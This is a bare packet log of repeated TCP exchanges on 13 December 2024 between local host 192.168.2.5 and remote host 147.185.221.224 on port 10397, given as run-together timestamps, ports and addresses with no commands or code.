                                          Dec 13, 2024 12:33:13.485027075 CET1039749887147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:13.488198996 CET4988710397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:13.608097076 CET1039749887147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:13.609335899 CET4988710397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:13.729263067 CET1039749887147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:13.729399920 CET4988710397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:13.849370003 CET1039749887147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:13.850490093 CET4988710397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:13.970308065 CET1039749887147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:13.970427036 CET4988710397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:14.090287924 CET1039749887147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:14.094643116 CET4988710397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:14.214499950 CET1039749887147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:14.214654922 CET4988710397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:14.334732056 CET1039749887147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:14.335839033 CET4988710397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:14.455890894 CET1039749887147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:14.456018925 CET4988710397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:14.575890064 CET1039749887147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:14.576077938 CET4988710397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:14.696605921 CET1039749887147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:14.697616100 CET4988710397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:14.818027020 CET1039749887147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:14.818118095 CET4988710397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:14.938396931 CET1039749887147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:14.938600063 CET4988710397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:15.058572054 CET1039749887147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:15.058657885 CET4988710397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:15.178582907 CET1039749887147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:15.178700924 CET4988710397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:15.298588991 CET1039749887147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:15.298662901 CET4988710397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:15.419275999 CET1039749887147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:15.419368982 CET4988710397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:15.539134979 CET1039749887147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:15.539679050 CET4988710397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:15.660846949 CET1039749887147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:15.660948992 CET4988710397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:15.781243086 CET1039749887147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:15.783144951 CET4988710397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:15.903017998 CET1039749887147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:15.906358004 CET4988710397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:16.026222944 CET1039749887147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:16.217268944 CET4988710397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:16.337110996 CET1039749887147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:16.338821888 CET4988710397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:16.458723068 CET1039749887147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:16.458797932 CET4988710397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:16.578775883 CET1039749887147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:16.578859091 CET4988710397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:16.698765993 CET1039749887147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:16.698832989 CET4988710397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:16.819094896 CET1039749887147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:16.819353104 CET4988710397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:16.981383085 CET1039749887147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:16.981458902 CET4988710397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:17.185465097 CET1039749887147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:17.185538054 CET4988710397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:17.433474064 CET1039749887147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:17.435466051 CET4988710397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:17.681447029 CET1039749887147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:17.681531906 CET4988710397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:17.929574966 CET1039749887147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:17.932164907 CET4988710397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:18.177311897 CET1039749887147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:18.177409887 CET4988710397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:18.421941042 CET1039749887147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:18.422049999 CET4988710397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:18.669960022 CET1039749887147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:18.670180082 CET4988710397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:18.917483091 CET1039749887147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:19.122932911 CET4988710397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:19.242897034 CET1039749887147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:19.242985010 CET4988710397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:19.362844944 CET1039749887147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:19.362953901 CET4988710397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:19.482688904 CET1039749887147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:19.482775927 CET4988710397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:19.602674961 CET1039749887147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:19.602787018 CET4988710397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:19.722507000 CET1039749887147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:19.722568989 CET4988710397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:19.842474937 CET1039749887147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:19.842624903 CET4988710397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:19.963243008 CET1039749887147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:19.964287996 CET4988710397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:20.084033012 CET1039749887147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:20.084386110 CET4988710397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:20.204220057 CET1039749887147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:20.204678059 CET4988710397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:20.324628115 CET1039749887147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:20.324897051 CET4988710397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:20.448410988 CET1039749887147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:20.452157021 CET4988710397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:20.571985960 CET1039749887147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:20.572098017 CET4988710397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:20.692476988 CET1039749887147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:20.693281889 CET4988710397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:20.813328028 CET1039749887147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:20.816214085 CET4988710397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:20.936125994 CET1039749887147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:20.940232992 CET4988710397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:21.060028076 CET1039749887147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:21.060199022 CET4988710397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:21.401928902 CET1039749887147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:21.402189970 CET4988710397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:21.605546951 CET1039749887147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:21.608422995 CET4988710397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:21.853348017 CET1039749887147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:21.854286909 CET4988710397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:22.105614901 CET1039749887147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:22.105703115 CET4988710397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:22.353370905 CET1039749887147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:22.353454113 CET4988710397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:22.605370045 CET1039749887147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:22.605454922 CET4988710397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:22.849313974 CET1039749887147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:22.849436045 CET4988710397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:23.097445965 CET1039749887147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:23.097542048 CET4988710397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:23.341442108 CET1039749887147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:23.341532946 CET4988710397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:23.589329004 CET1039749887147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:23.589478970 CET4988710397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:23.833475113 CET1039749887147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:23.835376024 CET4988710397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:24.084084988 CET1039749887147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:24.084219933 CET4988710397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:24.329603910 CET1039749887147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:24.330607891 CET4988710397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:24.577532053 CET1039749887147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:24.577584982 CET4988710397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:24.821578026 CET1039749887147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:24.821661949 CET4988710397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:25.069418907 CET1039749887147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:25.069513083 CET4988710397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:25.321482897 CET1039749887147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:25.321618080 CET4988710397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:25.573385000 CET1039749887147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:25.575048923 CET4988710397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:25.821383953 CET1039749887147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:25.822913885 CET4988710397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:26.069480896 CET1039749887147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:26.070664883 CET4988710397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:26.317430019 CET1039749887147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:26.319355011 CET4988710397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:26.565361023 CET1039749887147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:26.565459013 CET4988710397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:26.809349060 CET1039749887147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:26.809616089 CET4988710397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:27.054462910 CET1039749887147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:27.060290098 CET4988710397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:27.309400082 CET1039749887147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:27.309473038 CET4988710397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:27.553335905 CET1039749887147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:27.553467989 CET4988710397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:27.797466993 CET1039749887147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:27.797548056 CET4988710397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:28.045388937 CET1039749887147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:28.045490980 CET4988710397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:28.289434910 CET1039749887147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:28.289552927 CET4988710397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:28.537380934 CET1039749887147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:28.540210009 CET4988710397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:28.785648108 CET1039749887147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:28.785747051 CET4988710397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:29.033457994 CET1039749887147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:29.033596039 CET4988710397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:29.281461954 CET1039749887147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:29.283390999 CET4988710397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:29.529392004 CET1039749887147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:29.529475927 CET4988710397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:29.773410082 CET1039749887147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:29.773535013 CET4988710397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:30.017812967 CET1039749887147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:30.017959118 CET4988710397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:30.265367031 CET1039749887147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:30.272171974 CET4988710397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:30.315634012 CET1039749887147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:30.391978979 CET1039749887147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:32.327105045 CET4994110397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:32.447139978 CET1039749941147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:32.447222948 CET4994110397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:32.449666977 CET4994110397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:32.569506884 CET1039749941147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:32.569578886 CET4994110397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:32.689618111 CET1039749941147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:33.238257885 CET4994110397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:33.358114004 CET1039749941147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:33.358169079 CET4994110397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:33.478218079 CET1039749941147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:33.478302956 CET4994110397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:33.711628914 CET1039749941147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:33.712085009 CET4994110397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:33.962379932 CET1039749941147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:33.962460041 CET4994110397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:34.082207918 CET1039749941147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:34.082309961 CET4994110397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:34.202058077 CET1039749941147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:34.204324961 CET4994110397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:34.325037003 CET1039749941147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:34.325480938 CET4994110397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:34.445530891 CET1039749941147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:34.447490931 CET4994110397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:34.567236900 CET1039749941147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:34.568147898 CET4994110397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:34.690006018 CET1039749941147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:34.690099955 CET4994110397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:34.809906006 CET1039749941147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:34.812143087 CET4994110397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:34.932007074 CET1039749941147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:34.932120085 CET4994110397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:35.052115917 CET1039749941147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:35.052203894 CET4994110397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:35.171997070 CET1039749941147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:35.172066927 CET4994110397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:35.291851997 CET1039749941147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:35.291950941 CET4994110397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:35.411696911 CET1039749941147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:35.411778927 CET4994110397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:35.533994913 CET1039749941147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:35.534058094 CET4994110397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:35.655282974 CET1039749941147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:35.655436993 CET4994110397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:35.775377989 CET1039749941147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:35.775670052 CET4994110397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:35.895577908 CET1039749941147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:35.898823023 CET4994110397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:36.019864082 CET1039749941147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:36.022605896 CET4994110397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:36.152350903 CET1039749941147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:36.154858112 CET4994110397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:36.274653912 CET1039749941147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:36.274728060 CET4994110397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:36.395596027 CET1039749941147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:36.398917913 CET4994110397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:36.518805981 CET1039749941147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:36.522866964 CET4994110397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:36.642757893 CET1039749941147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:36.646639109 CET4994110397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:36.766473055 CET1039749941147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:36.766550064 CET4994110397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:36.886401892 CET1039749941147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:36.886461020 CET4994110397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:37.006337881 CET1039749941147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:37.006769896 CET4994110397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:37.126831055 CET1039749941147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:37.126971960 CET4994110397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:37.246851921 CET1039749941147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:37.246931076 CET4994110397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:37.366744041 CET1039749941147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:37.367762089 CET4994110397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:37.487550974 CET1039749941147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:37.487783909 CET4994110397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:37.607570887 CET1039749941147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:37.607639074 CET4994110397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:37.727823973 CET1039749941147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:37.727905989 CET4994110397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:37.847811937 CET1039749941147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:37.847889900 CET4994110397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:37.967842102 CET1039749941147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:37.967941046 CET4994110397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:38.087738037 CET1039749941147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:38.087995052 CET4994110397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:38.207801104 CET1039749941147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:38.207869053 CET4994110397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:38.327636003 CET1039749941147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:38.327707052 CET4994110397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:38.447833061 CET1039749941147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:38.448396921 CET4994110397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:38.568345070 CET1039749941147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:38.572384119 CET4994110397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:38.693047047 CET1039749941147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:38.693968058 CET4994110397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:38.815881968 CET1039749941147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:38.816167116 CET4994110397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:38.935988903 CET1039749941147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:38.938749075 CET4994110397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:39.059384108 CET1039749941147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:39.059948921 CET4994110397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:39.180015087 CET1039749941147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:39.180131912 CET4994110397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:39.299858093 CET1039749941147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:39.302536964 CET4994110397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:39.422327042 CET1039749941147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:39.422475100 CET4994110397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:39.542490959 CET1039749941147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:39.542645931 CET4994110397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:39.662473917 CET1039749941147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:39.662585020 CET4994110397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:39.782620907 CET1039749941147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:39.782751083 CET4994110397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:39.902965069 CET1039749941147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:39.903105021 CET4994110397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:40.022979975 CET1039749941147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:40.023266077 CET4994110397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:40.150809050 CET1039749941147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:40.151278973 CET4994110397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:40.271171093 CET1039749941147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:40.271301985 CET4994110397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:40.392204046 CET1039749941147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:40.392335892 CET4994110397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:40.512104034 CET1039749941147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:40.514645100 CET4994110397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:40.634469032 CET1039749941147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:40.635339975 CET4994110397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:40.756943941 CET1039749941147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:40.759329081 CET4994110397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:40.879045963 CET1039749941147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:40.880593061 CET4994110397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:41.000267029 CET1039749941147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:41.000488997 CET4994110397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:41.120461941 CET1039749941147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:41.120549917 CET4994110397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:41.281369925 CET1039749941147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:41.281852007 CET4994110397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:41.489505053 CET1039749941147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:41.489664078 CET4994110397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:41.737436056 CET1039749941147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:41.737849951 CET4994110397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:41.989444017 CET1039749941147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:41.989543915 CET4994110397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:42.233493090 CET1039749941147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:42.233566999 CET4994110397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:42.482979059 CET1039749941147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:42.483083010 CET4994110397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:42.729475975 CET1039749941147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:42.729686975 CET4994110397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:42.981882095 CET1039749941147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:42.981967926 CET4994110397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:43.229821920 CET1039749941147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:43.229990005 CET4994110397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:43.477426052 CET1039749941147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:43.477513075 CET4994110397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:43.725353956 CET1039749941147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:43.726829052 CET4994110397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:43.973378897 CET1039749941147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:43.973644018 CET4994110397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:33:44.330467939 CET1039749941147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:33:44.331137896 CET4994110397192.168.2.5147.185.221.224
